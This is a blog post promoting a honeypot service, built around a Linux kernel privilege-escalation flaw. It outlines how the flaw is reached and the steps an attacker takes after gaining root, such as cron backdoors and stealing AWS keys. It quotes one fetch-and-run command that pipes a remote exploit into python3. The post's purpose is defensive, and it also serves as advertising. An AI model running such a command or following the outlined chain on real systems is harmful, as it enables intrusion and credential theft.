The bit nobody is talking about

What we actually see

Patch the kernel. Of course. Then drown them at the door. CVE-2026-31431 dropped this week. The disclosure site is at copy.fail and the writeup is short enough to read with coffee. The TL;DR: a logic flaw in the kernel's authencesn path, reachable through AF_ALG sockets, abused via splice() to land a 4-byte write into the page cache of any setuid binary. They picked /usr/bin/su for the demo. The whole exploit is 732 bytes of Python 3 standard library. No race window. No kernel offsets. Reliable across every affected distro from 2017 onward. Root shell. The kernel hands it over because AF_ALG is on by default and authencesn does the wrong thing under splice(). Copy Fail is a local privilege escalation. The attacker still needs an unprivileged shell on your box to fire it. That shell doesn't come from your hardened SSH. It comes from the WordPress plugin you forgot was installed. The Grafana on :3000. The Jenkins your CI team spun up two years ago. The leaked GitHub PAT in a public gist. The n-day on your firewall vendor that everyone is still patching. They land as www-data. They run the 732-byte one-liner. They're root. Backdoor in /etc/cron.d/. known_hosts dumped. AWS keys pulled from ~/.aws/credentials. Your Ansible inventory is now their target list. Friday they're inside. Sunday they push. Monday your /home is on a leak site and you're explaining to legal why prod creds lived on a Jenkins worker. I run TarPit.pro. It's a honeypot that answers on the ports your real services listen on, hands attackers a believable banner, then tarpits and bans them. Across 5 boxes in the last 20 days: That's the foothold market. Those are the IPs that, in another month, will be the ones running curl copy.fail/exp | python3 on whichever box they land on first. You're going to patch. Distros are already shipping fixes. The next CVE is already being written though, and the foothold pipeline doesn't care which kernel you're running. A honeypot doesn't replace patching. It buys you the one thing you can't get anywhere else: the brute forcer wastes their session on a fake SSH that never lets them in, gets banned across your fleet on the first connection and never reaches the box where Copy Fail or whatever comes next would have actually mattered. Try it free: https://tarpit.pro Single Go binary, systemd, fake banners on 70+ services, fleet wide bans across your servers. Free tier covers up to 2 servers with the cloud dashboard. Coupon LAUNCH101 gives 2 months free on Starter or Pro. Templates let you quickly answer FAQs or store snippets for re-use. Are you sure you want to ? It will become hidden in your post, but will still be visible via the comment's permalink. Hide child comments as well For further actions, you may consider blocking this person and/or reporting abuse